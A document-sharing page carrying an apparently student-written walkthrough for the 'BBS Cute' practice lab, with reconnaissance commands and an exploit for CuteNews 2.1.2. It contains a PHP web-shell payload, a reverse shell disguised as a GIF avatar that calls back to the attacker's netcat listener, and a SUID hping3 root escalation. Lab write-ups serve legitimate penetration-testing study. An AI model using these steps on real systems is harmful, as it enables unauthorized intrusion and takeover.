Add to collection(s) Add to saved
  1. No category
Uploaded by Harry Potter

BBS Cute.docx

advertisement 
(https://www.sevenlayers.com/index.php/373-vulnhub-bbs-cute-1-walkthrough)
https://oscppreparation.blogspot.com/search/label/SUID
Offensive Security | Labs | Play (offensive-security.com)
BBS Cute
Start with NMAP
nmap –sV –sT –O –A –p- (IP)
-sV (Version Detection)
-sT (full TCP Scan)
-O (attempt OS detection)
-A (Aggressive detection mode)
-p- (ports from 1 through 65535)
Syntex
sudo nmap -sV -sT -O -A -p- 192.168.55.128
Now look at gobuster see what directories you can pick up
you might need to install it – update kali first
sudo apt-get update
then we would like to see what directories are visible
locate directory-list
gobuster dir --url http://192.168.55.128 -x html,php,txt,js -w
/usr/share/dirbuster/wordlists/directory-list-1.0.txt
-x extensions string
-w wordlist sting
you will see the directory listing, try browsing to one of them.
I tried the first one /index.php.
Now we get a logon page, and we can see the web page is running on something called called
Cutenews 2.1.2
Run
Searchsploit CuteNews 2.1.2
Take note of
php/webapps/48800.py
/usr/share/exploitdb/exploits/php/webapps/48800.py
On the webpage – register
Right click to get gate source – look for “captcha.php"
It will look something like
<html><body style="font-size: 42px; font-family: Arial, Tahoma, Serif;">oyivuc</body></html>
Now you have an account – I called mine Joe
Now let us take a look at the exploit
https://www.exploit-db.com/exploits/48800
payload = "GIF8;\n<?php system($_REQUEST['cmd']) ?>" <- this is the
vulnerability, now let’s try and exploit it.
now look for a reverse-shell php-reverse-shell.php
I just copied it to my Desktop
cp /usr/share/webshells/php/php-reverse-shell.php /home/kali/Desktop
look at the file
ie
file php-reverse-shell.php
php-reverse-shell.php: PHP script, ASCII text
We want to make sure GIF is part of the file.
add it right at the top
GIF89;
write the file.
now look at the file again, you will see the file is now a Gif Image
Add your kali IP address and port I make mine 4545
run netcat
nc -lvp 4545
upload your file on your account
go back to your avatar - copy the image link - and paste in a new window
Check and make sure its still got the server IP - if not just fix that. run it and you should get a netcat
session.
now we have a reverse shell, we want a bash
python -c 'import pty; pty.spawn("/bin/bash")'
now we want a linux type emulator
export TERM=xterm
let's start to look for the flag
we would want to see who has root access
sudo -l
by luck i just typed hping3
then /bin/bash
exit
/bin/bash -p
then i got root access
look for the flag
look in /root
While playing around I noticed a file called local.txt also had a flag in it.
find / -name local.txt 2>/dev/null
Related documents
Web development
Web development
FINANCIAL STUDY
FINANCIAL STUDY
PROMISSORY NOTE
PROMISSORY NOTE
pTA
pTA
It's that time of the year when we hire student... projects. I'm looking to hire a CSCI student for some...
It's that time of the year when we hire student... projects. I'm looking to hire a CSCI student for some...
Download
advertisement